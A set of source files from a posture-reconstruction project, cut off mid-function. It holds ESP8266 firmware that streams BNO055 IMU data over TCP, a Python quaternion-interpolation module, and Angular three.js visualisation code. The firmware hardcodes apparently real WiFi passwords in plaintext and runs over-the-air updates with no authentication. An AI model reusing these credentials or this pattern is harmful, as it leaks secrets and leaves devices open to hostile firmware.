"text": "#include <ESP8266WiFi.h>\n#include <ESP8266mDNS.h>\n#include <WiFiUdp.h>\n#include <ArduinoOTA.h>\n\n#include <Adafruit_BNO055_modified.h>\n#include <Adafruit_Sensor.h>\n#include <utility/imumaths.h>\n\n#include \"TimerObject.h\"\n\n#define CHIP_ID (0) // CHANGE THIS FOR EACH CHIP!!!!!!\n#define ESP8266\n#define OTA_WAIT_TIME (3000)\n#define SDA (0)\n#define SCL (4)\n#define BAUD_RATE (115200)\n#define BNO055_CAL_DELAY_MS (10)\n#define INTERVAL_100HZ (10)\n#define INTERVAL_20HZ (50)\n#define INTERVAL_1HZ (100)\n#define BOARD_LED (2)\n#define WORKING_BLINK_COUNT (20)\n#define CAL_BLINK_COUNT (5)\n#define DATA_BUFF_LENGTH (17)\n#define PORT (9000)\n // ID timestamp payload\n#define DATA_BUFF_100HZ_SIZE (60) // sizeof(utin32_t) + sizeof(utin32_t) + 13 * sizeof(float)\n#define DATA_BUFF_20HZ_SIZE (20) // sizeof(utin32_t) + sizeof(utin32_t) + 3 * sizeof(float)\n#define DATA_BUFF_1HZ_SIZE (12) // sizeof(utin32_t) + sizeof(utin32_t) + 1 * sizeof(float)\n\n\n\n// const char* ssid = \"yjinms\";\n// const char* password = \"1fdd2EE3b448@f432@2f\";\n// const char* host = \"192.168.0.6\";\n\nconst char* ssid = \"raspiDatalogger\";\nconst char* password = \"d]WJ/6Z\\\\jBu#]g0*Q]XT\";\nconst char* host = \"192.168.2.1\";\n\n\n// const char* host = \"192.168.4.1\";\n\nint led_val = 0;\nuint working_counter = 0;\nuint cal_counter = 0;\n\nTimerObject* timer_100Hz;\nTimerObject* timer_20Hz;\nTimerObject* timer_1Hz;\n\nuint32_t timeStamp100Hz;\nuint32_t timeStamp20Hz;\nuint32_t timeStamp1Hz;\n\n\nvolatile char dataBuff100hz[DATA_BUFF_100HZ_SIZE];\nvolatile char dataBuff20hz[DATA_BUFF_20HZ_SIZE];\nvolatile char dataBuff1hz[DATA_BUFF_1HZ_SIZE];\n\n\nuint32_t* timeStamp100Hz_p = (uint32_t *) (dataBuff100hz + 4);\nuint32_t* timeStamp20Hz_p = (uint32_t *) (dataBuff20hz + 4);\nuint32_t* timeStamp1Hz_p = (uint32_t *) (dataBuff1hz + 4);\n\nfloat* buff100hz = (float *) (dataBuff100hz + 8);\nfloat* buff20hz = (float *) (dataBuff20hz + 8);\nfloat* buff1hz = (float *) (dataBuff1hz + 8);\n\nimu::Quaternion quat;\nimu::Vector<3> gyro, lacc, acc, magn;\n\n\nbool ota_flag = true;\nbool mySetup_finished = false;\n\nAdafruit_BNO055 bno;\nWiFiClient client;\n\nvoid setup() {\n pinMode(BOARD_LED, OUTPUT);\n digitalWrite(BOARD_LED, 0);\n Serial.begin(BAUD_RATE);\n Serial.println(\"Booting\");\n WiFi.mode(WIFI_STA);\n WiFi.begin(ssid, password);\n while (WiFi.waitForConnectResult() != WL_CONNECTED) {\n Serial.println(\"Connection Failed! 
Rebooting...\");\n delay(5000);\n ESP.restart();\n }\n\n // Port defaults to 8266\n // ArduinoOTA.setPort(8266);\n\n // Hostname defaults to esp8266-[ChipID]\n ArduinoOTA.setHostname(\"myesp8266\");\n\n // No authentication by default\n // ArduinoOTA.setPassword((const char *)\"343\");\n\n ArduinoOTA.onStart([]() {\n Serial.println(\"Start\");\n });\n ArduinoOTA.onEnd([]() {\n Serial.println(\"\\nEnd\");\n });\n ArduinoOTA.onProgress([](unsigned int progress, unsigned int total) {\n Serial.printf(\"Progress: %u%%\\r\", (progress / (total / 100)));\n });\n ArduinoOTA.onError([](ota_error_t error) {\n Serial.printf(\"Error[%u]: \", error);\n if (error == OTA_AUTH_ERROR) Serial.println(\"Auth Failed\");\n else if (error == OTA_BEGIN_ERROR) Serial.println(\"Begin Failed\");\n else if (error == OTA_CONNECT_ERROR) Serial.println(\"Connect Failed\");\n else if (error == OTA_RECEIVE_ERROR) Serial.println(\"Receive Failed\");\n else if (error == OTA_END_ERROR) Serial.println(\"End Failed\");\n });\n ArduinoOTA.begin();\n Serial.println(\"Ready\");\n Serial.print(\"IP address: \");\n Serial.println(WiFi.localIP());\n\n if (!client.connect(host, PORT)) {\n Serial.println(\"Connection to dataServer failed!\");\n }\n // Attach chip id to each message\n uint32_t id = ESP.getChipId();\n uint32_t* id_p = (uint32_t*) dataBuff100hz;\n id_p[0] = id;\n id_p = (uint32_t*) dataBuff20hz;\n id_p[0] = id;\n id_p = (uint32_t*) dataBuff1hz;\n id_p[0] = id;\n digitalWrite(BOARD_LED, 1);\n}\n\n\nvoid readSensor100Hz() {\n quat = bno.getQuat();\n\n buff100hz[0] = quat.w();\n buff100hz[1] = quat.x();\n buff100hz[2] = quat.y();\n buff100hz[3] = quat.z();\n\n\n gyro = bno.getVector(Adafruit_BNO055::VECTOR_GYROSCOPE);\n buff100hz[4] = gyro.x();\n buff100hz[5] = gyro.y();\n buff100hz[6] = gyro.z();\n\n lacc = bno.getVector(Adafruit_BNO055::VECTOR_LINEARACCEL);\n buff100hz[7] = lacc.x();\n buff100hz[8] = lacc.y();\n buff100hz[9] = lacc.z();\n\n\n acc = bno.getVector(Adafruit_BNO055::VECTOR_ACCELEROMETER);\n buff100hz[10] = acc.x();\n buff100hz[11] = acc.y();\n buff100hz[12] = acc.z();\n\n\n timeStamp100Hz_p[0] = millis();\n\n client.write((char*) dataBuff100hz, DATA_BUFF_100HZ_SIZE);\n\n working_counter++;\n if (working_counter == WORKING_BLINK_COUNT) {\n working_counter = 0;\n led_val ^= 1;\n digitalWrite(BOARD_LED, led_val);\n }\n}\n\nvoid readSensor20Hz() {\n magn = bno.getVector(Adafruit_BNO055::VECTOR_MAGNETOMETER);\n buff20hz[0] = magn.x();\n buff20hz[1] = magn.y();\n buff20hz[2] = magn.z();\n timeStamp20Hz_p[0] = millis();\n client.write((char*) dataBuff20hz, DATA_BUFF_20HZ_SIZE);\n}\n\nvoid readSensor1Hz() {\n buff1hz[0] = (float) bno.getTemp();\n timeStamp1Hz_p[0] = millis();\n client.write((char*) dataBuff1hz, DATA_BUFF_1HZ_SIZE);\n\n}\n\nvoid mySetup() {\n bno = Adafruit_BNO055(55, 0x28);\n if(!bno.begin(SDA, SCL)) {\n Serial.println(\"bno not detected\");\n while(1);\n } else {\n Serial.println(\"bno detected!\");\n }\n displaySensorDetails(bno);\n displaySensorDetails(bno);\n displayCalStatus(bno);\n bno.setExtCrystalUse(true);\n timer_100Hz= new TimerObject(INTERVAL_100HZ);\n timer_100Hz -> setOnTimer(&readSensor100Hz);\n timer_20Hz= new TimerObject(INTERVAL_20HZ);\n timer_20Hz -> setOnTimer(&readSensor20Hz);\n timer_1Hz= new TimerObject(INTERVAL_1HZ);\n timer_1Hz -> setOnTimer(&readSensor1Hz);\n delay(300);\n timer_100Hz -> Start();\n timer_20Hz -> Start();\n timer_1Hz -> Start();\n}\n\nvoid displaySensorDetails(Adafruit_BNO055 bno) {\n sensor_t sensor;\n bno.getSensor(&sensor);\n Serial.print(\"Sensor: \");\n 
Serial.print(sensor.name);\n Serial.print(\"vDriver: \");\n Serial.print(sensor.version);\n Serial.print(\"UID: \");\n Serial.print(sensor.sensor_id);\n delay(100);\n}\n\nvoid displaySensorStatus(Adafruit_BNO055 bno) {\n uint8_t system_status, self_test_results, system_error;\n system_status = self_test_results = system_error = 0;\n bno.getSystemStatus(&system_status, &self_test_results, &system_error);\n Serial.print(\"SysStat: \");\n Serial.print(system_status);\n Serial.print(\"SelfTest: \");\n Serial.print(self_test_results);\n Serial.print(\"SysErr: \");\n Serial.println(system_error);\n delay(100);\n}\n\nvoid displayCalStatus(Adafruit_BNO055 bno) {\n uint8_t bno_system, bno_gyro, bno_accel, bno_mag;\n bno.getCalibration(&bno_system, &bno_gyro, &bno_accel, &bno_mag);\n while(bno_system != 3) {\n ArduinoOTA.handle();\n cal_counter++;\n if (cal_counter == CAL_BLINK_COUNT) {\n cal_counter = 0;\n led_val ^= 1;\n digitalWrite(BOARD_LED, led_val);\n // Serial.println(\"blink\");\n }\n bno.getCalibration(&bno_system, &bno_gyro, &bno_accel, &bno_mag);\n Serial.print(\"System: \");\n Serial.print(bno_system);\n Serial.print(\"gyro: \");\n Serial.print(bno_gyro);\n Serial.print(\"accel: \");\n Serial.print(bno_accel);\n Serial.print(\"mag: \");\n Serial.println(bno_mag);\n delay(BNO055_CAL_DELAY_MS);\n }\n led_val = 0;\n digitalWrite(BOARD_LED, led_val);\n\n}\n\n\nvoid loop() {\n ArduinoOTA.handle();\n if (! mySetup_finished) {\n mySetup();\n mySetup_finished = true;\n } else {\n if (client.connected()) {\n timer_100Hz -> Update();\n timer_20Hz -> Update();\n timer_1Hz -> Update();\n } else {\n client = WiFiClient();\n if (!client.connect(host, PORT)) {\n Serial.println(\"Connection to dataServer failed!\");\n delay(500);\n }\n }\n }\n}\n"
},
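The firmware above writes fixed-size binary frames: a `uint32` chip id, a `uint32` `millis()` timestamp, then little-endian floats (13 for the 60-byte 100 Hz frame, 3 for the 20 Hz frame, 1 for the 1 Hz frame). A sketch of decoding the 100 Hz frame; the repository's real decoder is the Node.js dataServer later in this listing, this Python version is only illustrative:

```python
# Illustrative decoder for the 60-byte 100 Hz frame defined above.
import struct

def parse_100hz(frame: bytes) -> dict:
    assert len(frame) == 60                    # DATA_BUFF_100HZ_SIZE
    chip_id, ts = struct.unpack_from('<II', frame, 0)
    v = struct.unpack_from('<13f', frame, 8)   # quat, gyro, lacc, acc
    return {
        'id': chip_id,
        'timestamp_ms': ts,
        'quat': dict(zip('wxyz', v[0:4])),
        'gyro': dict(zip('xyz', v[4:7])),
        'lacc': dict(zip('xyz', v[7:10])),
        'acc': dict(zip('xyz', v[10:13])),
    }
```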
{
"alpha_fraction": 0.7041636109352112,
"alphanum_fraction": 0.7041636109352112,
"avg_line_length": 26.93877601623535,
"blob_id": "875f012b6660229cad93c4c4a706896e07014d0e",
"content_id": "60c05ddd47ca8532eadfca118db1f58bb2820955",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 1369,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 49,
"path": "/oriTrakHAR-master/rawDataVis/src/app/components/top-nav-bar/top-nav-bar.component.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import { Component, OnInit } from '@angular/core';\nimport { SockService } from '../../services/sock.service';\nimport { DataModelService } from '../../services/data-model.service';\n\n@Component({\n selector: 'app-top-nav-bar',\n templateUrl: './top-nav-bar.component.html',\n styleUrls: ['./top-nav-bar.component.scss']\n})\nexport class TopNavBarComponent implements OnInit {\n public status;\n constructor(private dataModel: DataModelService, private sock: SockService) {\n this.status = this.dataModel.status;\n }\n\n ngOnInit() {\n }\n public objToArray(obj) {\n return Object.keys(obj);\n }\n\n public selectDate(date) {\n this.dataModel.updateStartTime(date);\n this.sock.updateHist();\n }\n\n public playWin() {\n this.dataModel.status.winPlaying = true;\n this.dataModel.windowPlay();\n }\n\n public stopWin() {\n this.dataModel.status.winPlaying = false;\n this.dataModel.stopPlay();\n }\n\n public toggleWindowFixed() {\n this.dataModel.status.windowFixed = !this.dataModel.status.windowFixed;\n this.dataModel.status.windowWidth = this.dataModel.status.histEndTime.valueOf() - this.dataModel.status.histStartTime.valueOf()\n }\n\n public selectSlowDown(option) {\n this.dataModel.status.windowPlaySlowDownFactor = option\n if (this.dataModel.windowPlayInterval) {\n this.dataModel.stopPlay();\n this.dataModel.windowPlay();\n }\n }\n}\n"
},
{
"alpha_fraction": 0.5617632269859314,
"alphanum_fraction": 0.5935418009757996,
"avg_line_length": 40.06842041015625,
"blob_id": "2a3824864549fce2ceb76a3f0025ce6b1740c023",
"content_id": "efe6fa1dd5e3dd5d42ccb50b3ce96885e7cb2c51",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7804,
"license_type": "no_license",
"max_line_length": 154,
"num_lines": 190,
"path": "/python-code/processStream.py",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "#euler_order: roll, pitch, yaw\n#original euler_order: yaw pitch roll\n#euler_order in oriTrakHAR: roll yaw pitch\n\nfrom scipy.interpolate import CubicSpline\nimport transformations\nimport numpy as np\nimport collections\nimport os\nimport time\nimport threading\nimport queue\nfrom pyquaternion import Quaternion\nthreshold = 1\n\ndef display(quat):\n print(quat[0], quat[1], quat[2], quat[3])\n\ndef processRow(data_dirs, t):\n torsoInterpo = createInterpolator(data_dirs[0])\n headInterpo = createInterpolator(data_dirs[1])\n leftInterpo = createInterpolator(data_dirs[2])\n rightInterpo = createInterpolator(data_dirs[3])\n\n torsoQuats = torsoInterpo[3].evaluate(t)\n headQuats = headInterpo[3].evaluate(t)\n leftQuats = leftInterpo[3].evaluate(t)\n rightQuats = rightInterpo[3].evaluate(t)\n torsoAccs = (torsoInterpo[0].evaluate(t), torsoInterpo[1].evaluate(t), torsoInterpo[2].evaluate(t))\n headAccs = (headInterpo[0].evaluate(t), headInterpo[1].evaluate(t), headInterpo[2].evaluate(t))\n leftAccs = (leftInterpo[0].evaluate(t), leftInterpo[1].evaluate(t), leftInterpo[2].evaluate(t))\n rightAccs = (rightInterpo[0].evaluate(t), rightInterpo[1].evaluate(t), rightInterpo[2].evaluate(t))\n \n\n #torsoOffset = Quaternion([-0.01483, 0.659224, 0.747234, 0.082578])\n #headOffset = Quaternion([-0.101687, 0.62569, 0.77248, 0.038392])\n torsoOffset = Quaternion([1, 0, 0, 0])\n headOffset = Quaternion([1, 0, 0, 0])\n for i in t:\n torsoQuat = next(torsoQuats)\n #print(torsoQuat[0], torsoQuat[1], torsoQuat[2], torsoQuat[3])\n torsoQuatValid = torsoQuat[0] is not None and not (torsoQuat[0] == torsoQuat[1] and torsoQuat[0] == torsoQuat[2] and torsoQuat[0] == torsoQuat[3])\n if torsoQuatValid:\n correctedTorsoQuat = torsoQuat*torsoOffset\n #display(correctedTorsoQuat)\n torsoAcc = []\n torsoAcc.append(next(torsoAccs[0]))\n torsoAcc.append(next(torsoAccs[1]))\n torsoAcc.append(next(torsoAccs[2]))\n torsoAccMag = np.linalg.norm(torsoAcc)\n if torsoAccMag < threshold:\n torsoOffset = Calibrate(torsoQuat)\n #print(torsoOffset)\n \n headQuat = next(headQuats)\n headQuatValid = headQuat[0] is not None and not (headQuat[0] == headQuat[1] and headQuat[0] == headQuat[2] and headQuat[0] == headQuat[3])\n if headQuatValid:\n correctedHeadQuat = headQuat*headOffset\n headAcc = []\n headAcc.append(next(headAccs[0]))\n headAcc.append(next(headAccs[1]))\n headAcc.append(next(headAccs[2]))\n headAccMag = np.linalg.norm(headAcc)\n if torsoQuatValid:\n headRelativeQuat = correctedTorsoQuat.inverse*correctedHeadQuat\n #headRelative = transformations.euler_from_quaternion(headRelativeQuat)\n headAccRelative = [headAcc[i] - torsoAcc[i] for i in range(0, 3)]\n if headAccMag < threshold:\n headOffset = Calibrate(headQuat)\n #print(headOffset)\n leftQuat = next(leftQuats)\n leftQuatValid = leftQuat[0] is not None and not (leftQuat[0] == leftQuat[1] and leftQuat[0] == leftQuat[2] and leftQuat[0] == leftQuat[3])\n if leftQuatValid:\n leftAcc = []\n leftAcc.append(next(leftAccs[0])) \n leftAcc.append(next(leftAccs[1]))\n leftAcc.append(next(leftAccs[2]))\n if torsoQuatValid:\n leftRelativeQuat = correctedTorsoQuat.inverse*leftQuat\n #leftRelative = transformations.euler_from_quaternion(leftRelativeQuat)\n #display(leftQuat)\n leftAccRelative = [leftAcc[i] - torsoAcc[i] for i in range(0, 3)]\n\n rightQuat = next(rightQuats)\n rightQuatValid = rightQuat[0] is not None and not (rightQuat[0] == rightQuat[1] and rightQuat[0] == rightQuat[2] and rightQuat[0] == rightQuat[3])\n if rightQuatValid:\n rightAcc = []\n 
rightAcc.append(next(rightAccs[0]))\n rightAcc.append(next(rightAccs[1]))\n rightAcc.append(next(rightAccs[2]))\n if torsoQuatValid:\n rightRelativeQuat = correctedTorsoQuat.inverse*rightQuat\n #rightRelative = transformations.euler_from_quaternion(rightRelativeQuat)\n rightAccRelative = [rightAcc[i] - torsoAcc[i] for i in range(0, 3)]\n yield (headRelativeQuat, leftRelativeQuat, rightRelativeQuat, headAccRelative, leftAccRelative, rightAccRelative)\n\n\n\ndef readData(inds, queues, data_dir):\n f = os.open(data_dir, os.O_NONBLOCK)\n while True:\n try:\n line = os.read(f, 4096).decode()\n if len(line) > 0:\n line = line.split('\\n')[-2]\n linelist = line.split(',')\n t = float(linelist[0])\n for i, ind in enumerate(inds):\n result = []\n for j in ind:\n result.append(float(linelist[j]))\n queues[i].put((t, result))\n else:\n time.sleep(0.05)\n except OSError as err:\n if err.errno == 11:\n continue\n else:\n raise err\n \n\n\ndef createInterpolator(data_dir):\n queues = [queue.Queue() for i in [0, 1, 2, 3]]\n th = threading.Thread(target=readData, args=([[3], [4], [5], [12, 13, 14]], queues, data_dir))\n th.daemon = True\n th.start()\n acc_x_inter = InterpoCubic(queues[0])\n acc_y_inter = InterpoCubic(queues[1])\n acc_z_inter = InterpoCubic(queues[2])\n quat_inter = InterpoQuat(queues[3])\n\n return (acc_x_inter, acc_y_inter, acc_z_inter, quat_inter)\n\n\nclass InterpoQuat:\n def __init__(self, data_time):\n self.data_time = data_time\n\n def evaluate(self, t):\n t0, data0 = self.data_time.get(block=True)\n t1, data1 = self.data_time.get(block=True)\n q = []\n for i in range(0, len(t)):\n while t[i] > t1:\n t0 = t1\n data0 = data1\n t1, data1 = self.data_time.get(block=True)\n\n #Here I assumed roll pitch yaw, but data may come in a different order\n q0 = transformations.quaternion_from_euler(data0[0], data0[1], data0[2]) \n q1 = transformations.quaternion_from_euler(data1[0], data1[1], data1[2])\n q0 = Quaternion(q0[3], q0[0], q0[1], q0[2])\n q1 = Quaternion(q1[3], q1[0], q1[1], q1[2])\n\n w = (t[i] - t0)/(t1 - t0)\n yield Quaternion.slerp(q0, q1, w)\n\nclass InterpoCubic:\n def __init__(self, data_time):\n self.data_time = data_time\n\n def evaluate(self, t):\n qtime = collections.deque([])\n qdata = collections.deque([])\n for i in range(0, 11):\n time, data = self.data_time.get(block=True)\n qtime.append(time)\n qdata.append(data)\n for i in range(0, len(t)):\n while t[i] > qtime[5]:\n time, data = self.data_time.get(block=True)\n qtime.append(time)\n qdata.append(data)\n qtime.popleft()\n qdata.popleft()\n poly = CubicSpline(qtime, qdata)\n yield poly(t)\n\ndef Calibrate(quat):\n #torsoZRotate = Quaternion([0.707, 0, 0, 0.707])\n torsoZRotate = Quaternion([1, 0, 0, 0])\n offset = quat*torsoZRotate\n euler = list(transformations.euler_from_quaternion([offset[1], offset[2], offset[3], offset[0]]))\n euler[0] = 0 #roll\n euler[1] = 0 #pitch\n expected = transformations.quaternion_from_euler(euler[0], euler[1], euler[2])\n expected = Quaternion(expected[3], expected[0], expected[1], expected[2])\n Offset = quat.inverse*expected\n return Offset\n\n"
},
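The heart of `processRow` above is expressing each limb in the calibrated torso frame by left-multiplying with the inverse torso quaternion. The same step isolated as a sketch, using the pyquaternion library the module already imports (the rotation angles are made up):

```python
# Sketch of the relative-orientation step: with both sensors rotated about
# the same axis, the relative rotation is simply the angle difference.
import math
from pyquaternion import Quaternion

torso = Quaternion(axis=[0, 0, 1], angle=math.radians(30))
limb = Quaternion(axis=[0, 0, 1], angle=math.radians(75))
relative = torso.inverse * limb
print(round(math.degrees(relative.angle)))  # -> 45
```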
{
"alpha_fraction": 0.63626629114151,
"alphanum_fraction": 0.6595574021339417,
"avg_line_length": 34.687896728515625,
"blob_id": "e2f11fcbca2587b8430c9e9a0a870bca8edc188e",
"content_id": "16fa6d82b48c89e5713e0960a51befa97e008d14",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 11206,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 314,
"path": "/oriTrakHAR-master/rawDataVis/src/app/components/shpere-hist/shpere-hist.component.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import { Component, OnInit, AfterViewInit, Input, OnChanges } from '@angular/core';\nimport { Observable } from 'rxjs/Observable';\nimport { DataModelService } from '../../services/data-model.service';\n\nimport * as THREE from 'three';\n@Component({\n selector: 'app-shpere-hist',\n templateUrl: './shpere-hist.component.html',\n styleUrls: ['./shpere-hist.component.css']\n})\nexport class ShpereHistComponent implements OnInit {\n @Input() name: string;\n @Input() container: HTMLElement;\n @Input() axisNames: string[];\n @Input() ratio: number;\n\n histUpdateObservable: Observable<any> = this.dataModel.getNewHistUpdateSubscribable()\n camera: any;\n scene: any;\n renderer: any;\n geometry: any;\n material: any;\n mesh: any;\n rendererHeight = 800;\n rendererWidth = 800;\n RADUIS = 350;\n AXIS_LENGTH = 430;\n\n TRACE_SEGMENTS = 25;\n objectDragged = 'none';\n mousePos = {x: 0, y: 0};\n cameraPos = {x: 0.425, y: 0.595};\n vectorObject: any = new THREE.Line();\n\n sphere: THREE.Mesh\n\n vectorQuaternion: any = new THREE.Quaternion();\n rotationAxis: any = new THREE.Vector3(0, 1, 0);\n axisXName: any;\n axisYName: any;\n axisZName: any;\n // eulerOrder = 'XYZ';\n eulerOrder = 'YZX';\n\n showAxis = true;\n constructor(private dataModel: DataModelService) { }\n\n ngOnInit() {\n this.rendererHeight *= this.ratio;\n this.rendererWidth *= this.ratio;\n const aspectRatio = 1;\n this.camera = new THREE.PerspectiveCamera(75, aspectRatio, 1, 10000);\n this.turnCamera();\n\n this.scene = new THREE.Scene();\n // this.scene.add( new THREE.HemisphereLight( 0xffffee, 0x080820, 1 ); );\n\n\n this.initGrid();\n this.initAxes();\n this.initAxesNames();\n // this.initLineTrace();\n // this.initRotationAxis();\n\n\n\n this.renderer = new THREE.WebGLRenderer({ alpha: true , antialias: true});\n this.renderer.setSize(this.rendererWidth, this.rendererHeight);\n this.renderer.setClearColor( 0xffffff, 1 );\n this.container.appendChild(this.renderer.domElement);\n this.container.addEventListener('mousemove', this.handleMouseMove.bind(this), false);\n this.container.addEventListener('mousedown', this.handleMouseDown.bind(this), false);\n this.container.addEventListener('mouseup', this.handleMouseUp.bind(this), false);\n this.container.addEventListener('touchmove', this.handleTouchMove.bind(this), false);\n this.container.addEventListener('touchstart', this.handleTouchStart.bind(this), false);\n this.container.addEventListener('touchend', this.handleTouchEnd.bind(this), false);\n // this.updateRotationAxis();\n\n // this.scene.add(this.rotationAxisObject);\n\n // vectorQuaternion.normalize();\n // this.renderer.render(this.scene, this.camera);\n // this.animate(this.angleData);\n this.initSphere();\n this.updateVectorVisuals();\n this.renderer.render(this.scene, this.camera);\n this.animate();\n\n this.histUpdateObservable.subscribe((msg => {\n // console.log(msg)\n for (let i = 0; i < this.sphere.geometry.faces.length; i++) {\n let face = this.sphere.geometry.faces[i];\n face.color.setRGB(236 / 255, 240 / 255, 241 / 255)\n }\n msg.forEach(d => {\n // console.log(d)\n let face = this.sphere.geometry.faces[d.bin]\n // console.log(d.color)\n if (face) {\n face.color.setRGB(d.color.r / 255, d.color.g / 255, d.color.b / 255)\n } else {\n // console.log(d)\n }\n })\n this.sphere.geometry.verticesNeedUpdate = true;\n this.sphere.geometry.elementsNeedUpdate = true;\n this.sphere.geometry.morphTargetsNeedUpdate = true;\n this.sphere.geometry.uvsNeedUpdate = true;\n this.sphere.geometry.normalsNeedUpdate = true;\n 
this.sphere.geometry.colorsNeedUpdate = true;\n this.sphere.geometry.tangentsNeedUpdate = true;\n // console.log('set color finished')\n }).bind(this))\n }\n\n\n animate() {\n // this.vectorQuaternion.x = angleData.quaternion.x;\n // this.vectorQuaternion.w = angleData.quaternion.w;\n // this.vectorQuaternion.y = angleData.quaternion.y;\n // this.vectorQuaternion.z = angleData.quaternion.z;\n\n // this.updateRotationAxis();\n this.updateVectorVisuals();\n this.renderer.render(this.scene, this.camera);\n this.updateAxesNames();\n setTimeout(() => {\n this.animate();\n } , 30);\n }\n\n updateVectorVisuals() {\n\n }\n\n turnCamera() {\n this.camera.position.x = Math.sin(this.cameraPos.x) * 1000 * Math.cos(this.cameraPos.y);\n this.camera.position.z = Math.cos(this.cameraPos.x) * 1000 * Math.cos(this.cameraPos.y);\n this.camera.position.y = Math.sin(this.cameraPos.y) * 1000;\n this.camera.lookAt(new THREE.Vector3(0, 0, 0));\n }\n\n initGrid() {\n const GRID_SEGMENT_COUNT = 5;\n const gridLineMat = new THREE.LineBasicMaterial({color: 0xDDDDDD});\n const gridLineMatThick = new THREE.LineBasicMaterial({color: 0xAAAAAA, linewidth: 2});\n\n for (let i = -GRID_SEGMENT_COUNT; i <= GRID_SEGMENT_COUNT; i++) {\n const dist = this.AXIS_LENGTH * i / GRID_SEGMENT_COUNT;\n const gridLineGeomX = new THREE.Geometry();\n const gridLineGeomY = new THREE.Geometry();\n\n if (i === 0) {\n gridLineGeomX.vertices.push(new THREE.Vector3(dist, 0, -this.AXIS_LENGTH));\n gridLineGeomX.vertices.push(new THREE.Vector3(dist, 0, 0));\n\n gridLineGeomY.vertices.push(new THREE.Vector3(-this.AXIS_LENGTH, 0, dist));\n gridLineGeomY.vertices.push(new THREE.Vector3( 0, 0, dist));\n\n this.scene.add(new THREE.Line(gridLineGeomX, gridLineMatThick));\n this.scene.add(new THREE.Line(gridLineGeomY, gridLineMatThick));\n } else {\n gridLineGeomX.vertices.push(new THREE.Vector3(dist, 0, -this.AXIS_LENGTH));\n gridLineGeomX.vertices.push(new THREE.Vector3(dist, 0, this.AXIS_LENGTH));\n\n gridLineGeomY.vertices.push(new THREE.Vector3(-this.AXIS_LENGTH, 0, dist));\n gridLineGeomY.vertices.push(new THREE.Vector3( this.AXIS_LENGTH, 0, dist));\n\n this.scene.add(new THREE.Line(gridLineGeomX, gridLineMat));\n this.scene.add(new THREE.Line(gridLineGeomY, gridLineMat));\n }\n }\n }\n\n initAxes() {\n const xAxisMat = new THREE.LineBasicMaterial({color: 0xff0000, linewidth: 2});\n const xAxisGeom = new THREE.Geometry();\n xAxisGeom.vertices.push(new THREE.Vector3(0, 0, 0));\n xAxisGeom.vertices.push(new THREE.Vector3(this.AXIS_LENGTH, 0, 0));\n const xAxis = new THREE.Line(xAxisGeom, xAxisMat);\n this.scene.add(xAxis);\n\n const yAxisMat = new THREE.LineBasicMaterial({color: 0x00cc00, linewidth: 2});\n const yAxisGeom = new THREE.Geometry();\n yAxisGeom.vertices.push(new THREE.Vector3(0, 0, 0));\n yAxisGeom.vertices.push(new THREE.Vector3(0, this.AXIS_LENGTH, 0));\n const yAxis = new THREE.Line(yAxisGeom, yAxisMat);\n this.scene.add(yAxis);\n\n const zAxisMat = new THREE.LineBasicMaterial({color: 0x0000ff, linewidth: 2});\n const zAxisGeom = new THREE.Geometry();\n zAxisGeom.vertices.push(new THREE.Vector3(0, 0, 0));\n zAxisGeom.vertices.push(new THREE.Vector3(0, 0, this.AXIS_LENGTH));\n const zAxis = new THREE.Line(zAxisGeom, zAxisMat);\n this.scene.add(zAxis);\n }\n\n initAxesNames() {\n const objects = new Array(3);\n const colors = ['#ff0000', '#00cc00', '#0000ff'];\n for (let i = 0, len = objects.length; i < len; i++) {\n objects[i] = document.createElement('div');\n objects[i].innerHTML = this.axisNames[i];\n objects[i].style.position = 
'absolute';\n objects[i].style.transform = 'translateX(-50%) translateY(-50%)';\n objects[i].style.color = colors[i];\n document.body.appendChild(objects[i]);\n }\n this.axisXName = objects[0];\n this.axisYName = objects[1];\n this.axisZName = objects[2];\n }\n\n setAxisNames(axisName) {\n this.axisXName.innerHTML = axisName[0];\n this.axisYName.innerHTML = axisName[1];\n this.axisZName.innerHTML = axisName[2];\n }\n\n initSphere() {\n const faceColorMaterial = new THREE.MeshBasicMaterial(\n { color: 0xffffff, vertexColors: THREE.FaceColors } );\n\n const sphereGeometry = new THREE.SphereGeometry(this.RADUIS, 72, 36);\n console.log(sphereGeometry.faces.length)\n for (let i = 0; i < sphereGeometry.faces.length; i++) {\n let face = sphereGeometry.faces[i];\n face.color.setRGB(236 / 255, 240 / 255, 241 / 255)\n // if (i < 10) {\n // face.color.setRGB(1, 0, 0)\n // }\n }\n this.sphere = new THREE.Mesh( sphereGeometry, faceColorMaterial );\n //https://github.com/stemkoski/stemkoski.github.com/blob/master/Three.js/Mouse-Click.html\n this.scene.add( this.sphere );\n }\n\n handlePointerMove(x, y) {\n const mouseDiffX = x - this.mousePos.x;\n const mouseDiffY = y - this.mousePos.y;\n this.mousePos = {x: x, y: y};\n if (this.objectDragged === 'scene') {\n this.cameraPos.x -= mouseDiffX / 200;\n this.cameraPos.y += mouseDiffY / 200;\n this.cameraPos.y = Math.min(this.cameraPos.y, 3.1415926 / 2);\n this.cameraPos.y = Math.max(this.cameraPos.y, -3.1415926 / 2);\n this.turnCamera();\n }\n }\n\n handleTouchMove(event) {\n if (this.objectDragged !== 'none') {\n event.preventDefault();\n }\n this.handlePointerMove(event.touches[0].clientX, event.touches[0].clientY);\n }\n\n handleMouseMove(event) {\n if (this.objectDragged !== 'none') {\n event.preventDefault();\n }\n this.handlePointerMove(event.clientX, event.clientY);\n }\n\n\n handleTouchStart(event) {\n this.handlePointerStart(event.touches[0].clientX, event.touches[0].clientY);\n }\n handleMouseDown(event) {\n this.handlePointerStart(event.clientX, event.clientY);\n }\n\n handlePointerStart(x, y) {\n this.mousePos = {x: x, y: y};\n const rect = this.renderer.domElement.getBoundingClientRect();\n if (this.mousePos.x >= rect.left\n && this.mousePos.x <= rect.left + this.rendererWidth\n && this.mousePos.y >= rect.top\n && this.mousePos.y <= rect.top + this.rendererHeight && this.objectDragged === 'none') {\n this.objectDragged = 'scene';\n }\n }\n\n handleTouchEnd(event) {\n 